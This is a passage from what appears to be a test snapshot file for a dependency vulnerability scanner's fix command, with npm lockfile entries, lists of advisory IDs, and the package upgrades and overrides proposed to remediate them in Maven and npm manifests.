"2.4.0", "resolved": "https://registry.npmjs.org/spdx-exceptions/-/spdx-exceptions-2.4.0.tgz", "integrity": "sha512-hcjppoJ68fhxA/cjbN4T8N6uCUejN8yFw69ttpqtBeCbF3u13n7mb31NB9jKwGTTWWnt9IbRA/mf1FprYS8wfw==" }, "spdx-expression-parse": { "version": "3.0.1", "resolved": "https://registry.npmjs.org/spdx-expression-parse/-/spdx-expression-parse-3.0.1.tgz", "integrity": "sha512-cbqHunsQWnJNE6KhVSMsMeH5H/L9EpymbzqTQ3uLwNCLZ1Q481oWaofqH7nO6V07xlXwY6PhQdQ2IedWx/ZK4Q==", "requires": { "spdx-exceptions": "^2.1.0", "spdx-license-ids": "^3.0.0" } }, "spdx-license-ids": { "version": "3.0.17", "resolved": "https://registry.npmjs.org/spdx-license-ids/-/spdx-license-ids-3.0.17.tgz", "integrity": "sha512-sh8PWc/ftMqAAdFiBu6Fy6JUOYjqDJBJvIhpfDMyHrr0Rbp5liZqd4TjtQ/RgfLjKFZb+LMx5hpml5qOWy0qvg==" }, "sshpk": { "version": "1.18.0", "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.18.0.tgz", "integrity": 
"sha512-2p2KJZTSqQ/I3+HX42EpYOa2l3f8Erv8MWKsy2I9uf4wA7yFIkXRffYdsx86y6z4vHtV8u7g+pPlr8/4ouAxsQ==", "requires": { "asn1": "~0.2.3", "assert-plus": "^1.0.0", "bcrypt-pbkdf": "^1.0.0", "dashdash": "^1.12.0", "ecc-jsbn": "~0.1.1", "getpass": "^0.1.1", "jsbn": "~0.1.0", "safer-buffer": "^2.0.2", "tweetnacl": "~0.14.0" } }, "string_decoder": { "version": "1.1.1", "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", "integrity": "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", "requires": { "safe-buffer": "~5.1.0" } }, "string-width": { "version": "4.2.3", "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", "optional": true, "requires": { "emoji-regex": "^8.0.0", "is-fullwidth-code-point": "^3.0.0", "strip-ansi": "^6.0.1" } }, "strip-ansi": { "version": "6.0.1", "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", "optional": true, "requires": { "ansi-regex": "^5.0.1" } }, "supports-preserve-symlinks-flag": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==" }, "tough-cookie": { "version": "2.5.0", "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", "requires": { "psl": "^1.1.28", "punycode": "^2.1.1" } }, "tunnel-agent": { "version": "0.6.0", "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", "integrity": 
"sha512-McnNiV1l8RYeY8tBgEpuodCC1mLUdbSN+CYBL7kJsJNInOP8UjDDEwdk6Mw60vdLLrr5NHKZhMAOSrR2NZuQ+w==", "requires": { "safe-buffer": "^5.0.1" } }, "tweetnacl": { "version": "0.14.5", "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", "integrity": "sha512-KXXFFdAbFXY4geFIwoyNK+f5Z1b7swfXABfL7HXCmoIWMKU3dmS26672A4EeQtDzLKy7SXmfBu51JolvEKwtGA==" }, "typedarray": { "version": "0.0.6", "resolved": "https://registry.npmjs.org/typedarray/-/typedarray-0.0.6.tgz", "integrity": "sha512-/aCDEGatGvZ2BIk+HmLf4ifCJFwvKFNb9/JeZPMulfgFracn9QFcAf5GO8B/mweUjSoblS5In0cWhqpfs/5PQA==" }, "uri-js": { "version": "4.4.1", "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", "requires": { "punycode": "^2.1.0" } }, "util-deprecate": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/util-deprecate/-/util-deprecate-1.0.2.tgz", "integrity": "sha512-EPD5q1uXyFxJpCrLnCc1nHnq3gOa6DZBocAIiI2TaSCA7VCJ1UJDMagCzIkXNsUYfD1daK//LTEQ8xiIbrHtcw==" }, "uuid": { "version": "3.4.0", "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==" }, "validate-npm-package-license": { "version": "3.0.4", "resolved": "https://registry.npmjs.org/validate-npm-package-license/-/validate-npm-package-license-3.0.4.tgz", "integrity": "sha512-DpKm2Ui/xN7/HQKCtpZxoRWBhZ9Z0kqtygG8XCgNQ8ZlDnxuQmWhj566j8fN4Cu3/JmbhsDo7fcAJq4s9h27Ew==", "requires": { "spdx-correct": "^3.0.0", "spdx-expression-parse": "^3.0.0" } }, "verror": { "version": "1.10.0", "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", "integrity": "sha512-ZZKSmDAEFOijERBLkmYfJ+vmk3w+7hOLYDNkRCuRuMJGEmqYNCNLyBBFwWKVMhfwaEF3WOd0Zlw86U/WC/+nYw==", "requires": { "assert-plus": "^1.0.0", "core-util-is": "1.0.2", "extsprintf": "^1.2.0" }, "dependencies": { "core-util-is": { "version": 
"1.0.2", "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", "integrity": "sha512-3lqz5YjWTYnW6dlDa5TLaTCcShfar1e40rmcJVwCBJC6mWlFuj0eCHIElmG1g5kyuJ/GD+8Wn4FFCcz4gJPfaQ==" } } }, "wide-align": { "version": "1.1.5", "resolved": "https://registry.npmjs.org/wide-align/-/wide-align-1.1.5.tgz", "integrity": "sha512-eDMORYaPNZ4sQIuuYPDHdQvf4gyCF9rEEV/yPxGfwPkRodwEgiMUUXTx/dex+Me0wxx53S+NgUHaP7y3MGlDmg==", "optional": true, "requires": { "string-width": "^1.0.2 || 2 || 3 || 4" } }, "wrappy": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==" } } } --- [TestCommand/fix_non-interactive_json_override_pom.xml - 1] { "path": "/pom.xml", "ecosystem": "Maven", "strategy": "override", "vulnerabilities": [ { "id": "GHSA-2x83-r56g-cv47", "packages": [ { "name": "org.apache.httpcomponents:httpclient", "version": "4.0" } ] }, { "id": "GHSA-78wr-2p64-hpwj", "packages": [ { "name": "commons-io:commons-io", "version": "2.5" } ] }, { "id": "GHSA-7r82-7xv7-xcpj", "packages": [ { "name": "org.apache.httpcomponents:httpclient", "version": "4.0" } ] }, { "id": "GHSA-8vhq-qq4p-grq3", "packages": [ { "name": "org.codehaus.plexus:plexus-utils", "version": "3.0" } ] }, { "id": "GHSA-cfh5-3ghh-wfjx", "packages": [ { "name": "org.apache.httpcomponents:httpclient", "version": "4.0" } ] }, { "id": "GHSA-fmj5-wv96-r2ch", "packages": [ { "name": "org.apache.httpcomponents:httpclient", "version": "4.0" } ] }, { "id": "GHSA-g6ph-x5wf-g337", "packages": [ { "name": "org.codehaus.plexus:plexus-utils", "version": "3.0" } ] }, { "id": "GHSA-gp7f-rwcx-9369", "packages": [ { "name": "org.jsoup:jsoup", "version": "1.14.1" } ] }, { "id": "GHSA-gw85-4gmf-m7rh", "packages": [ { "name": "org.apache.httpcomponents:httpclient", "version": "4.0" } ] }, { "id": "GHSA-gwrp-pvrq-jmwv", "packages": [ { "name": "commons-io:commons-io", "version": 
"2.5" } ] }, { "id": "GHSA-jcwr-x25h-x5fh", "packages": [ { "name": "org.codehaus.plexus:plexus-utils", "version": "3.0" } ] }, { "id": "GHSA-m72m-mhq2-9p6c", "packages": [ { "name": "org.jsoup:jsoup", "version": "1.14.1" } ] } ], "patches": [ { "packageUpdates": [ { "name": "org.apache.httpcomponents:httpclient", "versionFrom": "4.0", "versionTo": "4.5.13", "transitive": true } ], "fixed": [ { "id": "GHSA-2x83-r56g-cv47", "packages": [ { "name": "org.apache.httpcomponents:httpclient", "version": "4.0" } ] }, { "id": "GHSA-7r82-7xv7-xcpj", "packages": [ { "name": "org.apache.httpcomponents:httpclient", "version": "4.0" } ] }, { "id": "GHSA-cfh5-3ghh-wfjx", "packages": [ { "name": "org.apache.httpcomponents:httpclient", "version": "4.0" } ] }, { "id": "GHSA-fmj5-wv96-r2ch", "packages": [ { "name": "org.apache.httpcomponents:httpclient", "version": "4.0" } ] }, { "id": "GHSA-gw85-4gmf-m7rh", "packages": [ { "name": "org.apache.httpcomponents:httpclient", "version": "4.0" } ] } ] }, { "packageUpdates": [ { "name": "org.codehaus.plexus:plexus-utils", "versionFrom": "3.0", "versionTo": "3.0.24", "transitive": false } ], "fixed": [ { "id": "GHSA-8vhq-qq4p-grq3", "packages": [ { "name": "org.codehaus.plexus:plexus-utils", "version": "3.0" } ] }, { "id": "GHSA-g6ph-x5wf-g337", "packages": [ { "name": "org.codehaus.plexus:plexus-utils", "version": "3.0" } ] }, { "id": "GHSA-jcwr-x25h-x5fh", "packages": [ { "name": "org.codehaus.plexus:plexus-utils", "version": "3.0" } ] } ] }, { "packageUpdates": [ { "name": "commons-io:commons-io", "versionFrom": "2.5", "versionTo": "2.14.0", "transitive": true } ], "fixed": [ { "id": "GHSA-78wr-2p64-hpwj", "packages": [ { "name": "commons-io:commons-io", "version": "2.5" } ] }, { "id": "GHSA-gwrp-pvrq-jmwv", "packages": [ { "name": "commons-io:commons-io", "version": "2.5" } ] } ] }, { "packageUpdates": [ { "name": "org.jsoup:jsoup", "versionFrom": "1.14.1", "versionTo": "1.15.3", "transitive": true } ], "fixed": [ { "id": 
"GHSA-gp7f-rwcx-9369", "packages": [ { "name": "org.jsoup:jsoup", "version": "1.14.1" } ] }, { "id": "GHSA-m72m-mhq2-9p6c", "packages": [ { "name": "org.jsoup:jsoup", "version": "1.14.1" } ] } ] } ] } --- [TestCommand/fix_non-interactive_json_override_pom.xml - 2] Resolving /pom.xml... Rewriting /pom.xml... --- [TestCommand/fix_non-interactive_json_override_pom.xml - 3] 4.0.0 dev.osv osv-fix 1 4.5.13 commons-io commons-io 2.14.0 org.jsoup jsoup 1.15.3 org.apache.httpcomponents httpclient ${httpclient.version} org.apache.maven.wagon wagon-http 3.0.0 org.codehaus.plexus plexus-utils 3.0.24 --- [TestCommand/fix_non-interactive_json_relax_package.json - 1] { "path": "/package.json", "ecosystem": "npm", "strategy": "relax", "vulnerabilities": [ { "id": "GHSA-43f8-2h32-f4cj", "packages": [ { "name": "hosted-git-info", "version": "1.6.0" } ] }, { "id": "GHSA-6rw7-vpxm-498p", "packages": [ { "name": "qs", "version": "6.5.5" } ], "unactionable": true }, { "id": "GHSA-72xf-g2v4-qvf3", "packages": [ { "name": "tough-cookie", "version": "2.5.0" } ], "unactionable": true }, { "id": "GHSA-c2qf-rxjj-qqgw", "packages": [ { "name": "semver", "version": "4.3.6" } ] }, { "id": "GHSA-c6rq-rjc2-86v2", "packages": [ { "name": "chownr", "version": "0.0.2" } ] }, { "id": "GHSA-fjxv-7rqg-78g4", "packages": [ { "name": "form-data", "version": "2.3.3" } ], "unactionable": true }, { "id": "GHSA-p8p7-x288-28g6", "packages": [ { "name": "request", "version": "2.88.2" } ], "unactionable": true } ], "patches": [ { "packageUpdates": [ { "name": "npm-registry-client", "versionFrom": "6.2.0", "versionTo": "^7.5.0", "transitive": false } ], "fixed": [ { "id": "GHSA-43f8-2h32-f4cj", "packages": [ { "name": "hosted-git-info", "version": "1.6.0" } ] }, { "id": "GHSA-c2qf-rxjj-qqgw", "packages": [ { "name": "semver", "version": "4.3.6" } ] }, { "id": "GHSA-c6rq-rjc2-86v2", "packages": [ { "name": "chownr", "version": "0.0.2" } ] } ] } ] } --- [TestCommand/fix_non-interactive_json_relax_package.json - 2] 
Resolving /package.json... Rewriting /package.json... --- [TestCommand/fix_non-interactive_json_relax_package.json - 3] { "name": "osv-fix", "version": "1.0.0", "description": "", "main": "index.js", "scripts": { "test": "echo /"Error: no test specified/" && exit 1" }, "author": "", "license": "ISC", "dependencies": { "npm-registry-client": "^7.5.0" } } --- [TestCommand/fix_non-interactive_override_pom.xml - 1] Resolving /pom.xml... Found 12 vulnerabilities matching the filter Can fix 12/12 matching vulnerabilities by overriding 4 dependencies OVERRIDE-PACKAGE: org.apache.httpcomponents:httpclient,4.5.13 OVERRIDE-PACKAGE: org.codehaus.plexus:plexus-utils,3.0.24 OVERRIDE-PACKAGE: commons-io:commons-io,2.14.0 OVERRIDE-PACKAGE: org.jsoup:jsoup,1.15.3 FIXED-VULN-IDS: GHSA-2x83-r56g-cv47,GHSA-78wr-2p64-hpwj,GHSA-7r82-7xv7-xcpj,GHSA-8vhq-qq4p-grq3,GHSA-cfh5-3ghh-wfjx,GHSA-fmj5-wv96-r2ch,GHSA-g6ph-x5wf-g337,GHSA-gp7f-rwcx-9369,GHSA-gw85-4gmf-m7rh,GHSA-gwrp-pvrq-jmwv,GHSA-jcwr-x25h-x5fh,GHSA-m72m-mhq2-9p6c REMAINING-VULNS: 0 UNFIXABLE-VULNS: 0 Rewriting /pom.xml... --- [TestCommand/fix_non-interactive_override_pom.xml - 2] --- [TestCommand/fix_non-interactive_override_pom.xml - 3] 4.0.0 dev.osv osv-fix 1 4.5.13 commons-io commons-io 2.14.0 org.jsoup jsoup 1.15.3 org.apache.httpcomponents httpclient ${httpclient.version} org.apache.maven.wagon wagon-http 3.0.0 org.codehaus.plexus plexus-utils 3.0.24 --- [TestCommand/fix_non-interactive_relax_package.json - 1] Resolving /package.json... Found 7 vulnerabilities matching the filter Can fix 3/7 matching vulnerabilities by changing 1 dependencies UPGRADED-PACKAGE: npm-registry-client,6.2.0,^7.5.0 FIXED-VULN-IDS: GHSA-43f8-2h32-f4cj,GHSA-c2qf-rxjj-qqgw,GHSA-c6rq-rjc2-86v2 REMAINING-VULNS: 4 UNFIXABLE-VULNS: 4 Rewriting /package.json... 
--- [TestCommand/fix_non-interactive_relax_package.json - 2] --- [TestCommand/fix_non-interactive_relax_package.json - 3] { "name": "osv-fix", "version": "1.0.0", "description": "", "main": "index.js", "scripts": { "test": "echo /"Error: no test specified/" && exit 1" }, "author": "", "license": "ISC", "dependencies": { "npm-registry-client": "^7.5.0" } } --- [TestCommand/fix_non_interactive_in_place_package_lock_json_with_native_data_source - 1] Scanning /package-lock.json... Found 12 vulnerabilities matching the filter Can fix 7/12 matching vulnerabilities by changing 5 dependencies UPGRADED-PACKAGE: minimatch,3.1.2,3.1.5 UPGRADED-PACKAGE: ajv,6.12.6,6.14.0 UPGRADED-PACKAGE: brace-expansion,1.1.11,1.1.12 UPGRADED-PACKAGE: concat-stream,1.5.0,1.6.1 UPGRADED-PACKAGE: hosted-git-info,2.1.4,2.8.9 FIXED-VULN-IDS: GHSA-23c5-xmqv-rm74,GHSA-2g4f-4pwh-qvx6,GHSA-3ppc-4f35-3m26,GHSA-43f8-2h32-f4cj,GHSA-7r86-cg39-jmmj,GHSA-g74r-ffvr-5q9f,GHSA-v6h2-p8h4-qcjw REMAINING-VULNS: 5 UNFIXABLE-VULNS: 7 Rewriting /package-lock.json... 
--- [TestCommand/fix_non_interactive_in_place_package_lock_json_with_native_data_source - 2] --- [TestCommand/fix_non_interactive_in_place_package_lock_json_with_native_data_source - 3] { "name": "osv-fix", "version": "1.0.0", "lockfileVersion": 2, "requires": true, "packages": { "": { "name": "osv-fix", "version": "1.0.0", "license": "ISC", "dependencies": { "npm-registry-client": "^6.2.0" } }, "node_modules/ajv": { "version": "6.14.0", "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.14.0.tgz", "integrity": "sha512-IWrosm/yrn43eiKqkfkHis7QioDleaXQHdDVPKg0FSwwd/DuvyX79TZnFOnYpB7dcsFAMmtFztZuXPDvSePkFw==", "dependencies": { "fast-deep-equal": "^3.1.1", "fast-json-stable-stringify": "^2.0.0", "json-schema-traverse": "^0.4.1", "uri-js": "^4.2.2" }, "funding": { "type": "github", "url": "https://github.com/sponsors/epoberezkin" } }, "node_modules/ansi-regex": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", "optional": true, "engines": { "node": ">=8" } }, "node_modules/aproba": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/aproba/-/aproba-2.0.0.tgz", "integrity": "sha512-lYe4Gx7QT+MKGbDsA+Z+he/Wtef0BiwDOlK/XkBrdfsh9J/jPPXbX0tE9x9cl27Tmu5gg3QUbUrQYa/y+KOHPQ==", "optional": true }, "node_modules/are-we-there-yet": { "version": "4.0.2", "resolved": "https://registry.npmjs.org/are-we-there-yet/-/are-we-there-yet-4.0.2.tgz", "integrity": "sha512-ncSWAawFhKMJDTdoAeOV+jyW1VCMj5QIAwULIBV0SSR7B/RLPPEQiknKcg/RIIZlUQrxELpsxMiTUoAQ4sIUyg==", "optional": true, "engines": { "node": "^14.17.0 || ^16.13.0 || >=18.0.0" } }, "node_modules/asn1": { "version": "0.2.6", "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.6.tgz", "integrity": "sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==", "dependencies": { "safer-buffer": "~2.1.0" } }, 
"node_modules/assert-plus": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", "integrity": "sha512-NfJ4UzBCcQGLDlQq7nHxH+tv3kyZ0hHQqF5BO6J7tNJeP5do1llPr8dZ8zHonfhAu0PHAdMkSo+8o0wxg9lZWw==", "engines": { "node": ">=0.8" } }, "node_modules/asynckit": { "version": "0.4.0", "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==" }, "node_modules/aws-sign2": { "version": "0.7.0", "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", "integrity": "sha512-08kcGqnYf/YmjoRhfxyu+CLxBjUtHLXLXX/vUfx9l2LYzG3c1m61nrpyFUZI6zeS+Li/wWMMidD9KgrqtGq3mA==", "engines": { "node": "*" } }, "node_modules/aws4": { "version": "1.12.0", "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.12.0.tgz", "integrity": "sha512-NmWvPnx0F1SfrQbYwOi7OeaNGokp9XhzNioJ/CSBs8Qa4vxug81mhJEAVZwxXuBmYB5KDRfMq/F3RR0BIU7sWg==" }, "node_modules/balanced-match": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" }, "node_modules/bcrypt-pbkdf": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", "integrity": "sha512-qeFIXtP4MSoi6NLqO12WfqARWWuCKi2Rn/9hJLEmtB5yTNr9DqFWkJRCf2qShWzPeAMRnOgCrq0sg/KLv5ES9w==", "dependencies": { "tweetnacl": "^0.14.3" } }, "node_modules/brace-expansion": { "version": "1.1.12", "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.12.tgz", "integrity": "sha512-9T9UjW3r0UW5c1Q7GTwllptXwhvYmEzFhzMfZ9H7FQWt+uZePjZPjBP/W1ZEyZ1twGWom5/56TF4lPcqjnDHcg==", "dependencies": { "concat-map": "0.0.1", "balanced-match": "^1.0.0" } }, "node_modules/caseless": { "version": "0.12.0", "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", "integrity": 
"sha512-4tYFyifaFfGacoiObjJegolkwSU4xQNGbVgUiNYVUxbQ2x2lUsFvY4hVgVzGiIe6WLOPqycWXA40l+PWsxthUw==" }, "node_modules/chownr": { "version": "0.0.2", "resolved": "https://registry.npmjs.org/chownr/-/chownr-0.0.2.tgz", "integrity": "sha512-4sa7ZJ+/DavveVRsu49tUbYvLn5cS75w8gLQr14jXlFxSNbuoY7G6gPjcVfgdQ+c4BW02b0hXV5nOXYFD7Fmpw==" }, "node_modules/color-support": { "version": "1.1.3", "resolved": "https://registry.npmjs.org/color-support/-/color-support-1.1.3.tgz", "integrity": "sha512-qiBjkpbMLO/HL68y+lh4q0/O1MZFj2RX6X/KmMa3+gJD3z+WwI1ZzDHysvqHGS3mP6mznPckpXmw1nI9cJjyRg==", "optional": true, "bin": { "color-support": "bin.js" } }, "node_modules/combined-stream": { "version": "1.0.8", "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", "dependencies": { "delayed-stream": "~1.0.0" }, "engines": { "node": ">= 0.8" } }, "node_modules/concat-map": { "version": "0.0.1", "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==" }, "node_modules/concat-stream": { "version": "1.6.1", "resolved": "https://registry.npmjs.org/concat-stream/-/concat-stream-1.6.1.tgz", "integrity": "sha512-gslSSJx03QKa59cIKqeJO9HQ/WZMotvYJCuaUULrLpjj8oG40kV2Z+gz82pVxlTkOADi4PJxQPPfhl1ELYrrXw==", "engines": [ "node >= 0.8" ], "dependencies": { "inherits": "^2.0.3", "typedarray": "^0.0.6", "readable-stream": "^2.2.2" } }, "node_modules/console-control-strings": { "version": "1.1.0", "resolved": "https://registry.npmjs.org/console-control-strings/-/console-control-strings-1.1.0.tgz", "integrity": "sha512-ty/fTekppD2fIwRvnZAVdeOiGd1c7YXEixbgJTNzqcxJWKQnjJ/V1bNEEE6hygpM3WjwHFUVK6HTjWSzV4a8sQ==", "optional": true }, "node_modules/core-util-is": { "version": "1.0.3", "resolved": 
"https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.3.tgz", "integrity": "sha512-ZQBvi1DcpJ4GDqanjucZ2Hj3wEO5pZDS89BWbkcrvdxksJorwUDDZamX9ldFkp9aw2lmBDLgkObEA4DWNJ9FYQ==" }, "node_modules/dashdash": { "version": "1.14.1", "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", "integrity": "sha512-jRFi8UDGo6j+odZiEpjazZaWqEal3w/basFjQHQEwVtZJGDpxbH1MeYluwCS8Xq5wmLJooDlMgvVarmWfGM44g==", "dependencies": { "assert-plus": "^1.0.0" }, "engines": { "node": ">=0.10" } }, "node_modules/delayed-stream": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", "integrity": "sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==", "engines": { "node": ">=0.4.0" } }, "node_modules/ecc-jsbn": { "version": "0.1.2", "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", "integrity": "sha512-eh9O+hwRHNbG4BLTjEl3nw044CkGm5X6LoaCf7LPp7UU8Qrt47JYNi6nPX8xjW97TKGKm1ouctg0QSpZe9qrnw==", "dependencies": { "jsbn": "~0.1.0", "safer-buffer": "^2.1.0" } }, "node_modules/emoji-regex": { "version": "8.0.0", "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", "optional": true }, "node_modules/extend": { "version": "3.0.2", "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==" }, "node_modules/extsprintf": { "version": "1.3.0", "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", "integrity": "sha512-11Ndz7Nv+mvAC1j0ktTa7fAb0vLyGGX+rMHNBYQviQDGU0Hw7lhctJANqbPhu9nV9/izT/IntTgZ7Im/9LJs9g==", "engines": [ "node >=0.6.0" ] }, "node_modules/fast-deep-equal": { "version": "3.1.3", "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", "integrity": 
"sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==" }, "node_modules/fast-json-stable-stringify": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" }, "node_modules/forever-agent": { "version": "0.6.1", "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", "integrity": "sha512-j0KLYPhm6zeac4lz3oJ3o65qvgQCcPubiyotZrXqEaG4hNagNYO8qdlUrX5vwqv9ohqeT/Z3j6+yW067yWWdUw==", "engines": { "node": "*" } }, "node_modules/form-data": { "version": "2.3.3", "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", "dependencies": { "asynckit": "^0.4.0", "combined-stream": "^1.0.6", "mime-types": "^2.1.12" }, "engines": { "node": ">= 0.12" } }, "node_modules/fs.realpath": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==" }, "node_modules/function-bind": { "version": "1.1.2", "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==", "funding": { "url": "https://github.com/sponsors/ljharb" } }, "node_modules/gauge": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/gauge/-/gauge-5.0.1.tgz", "integrity": "sha512-CmykPMJGuNan/3S4kZOpvvPYSNqSHANiWnh9XcMU2pSjtBfF0XzZ2p1bFAxTbnFxyBuPxQYHhzwaoOmUdqzvxQ==", "optional": true, "dependencies": { "aproba": "^1.0.3 || ^2.0.0", "color-support": "^1.1.3", "console-control-strings": "^1.1.0", "has-unicode": "^2.0.1", "signal-exit": "^4.0.1", "string-width": 
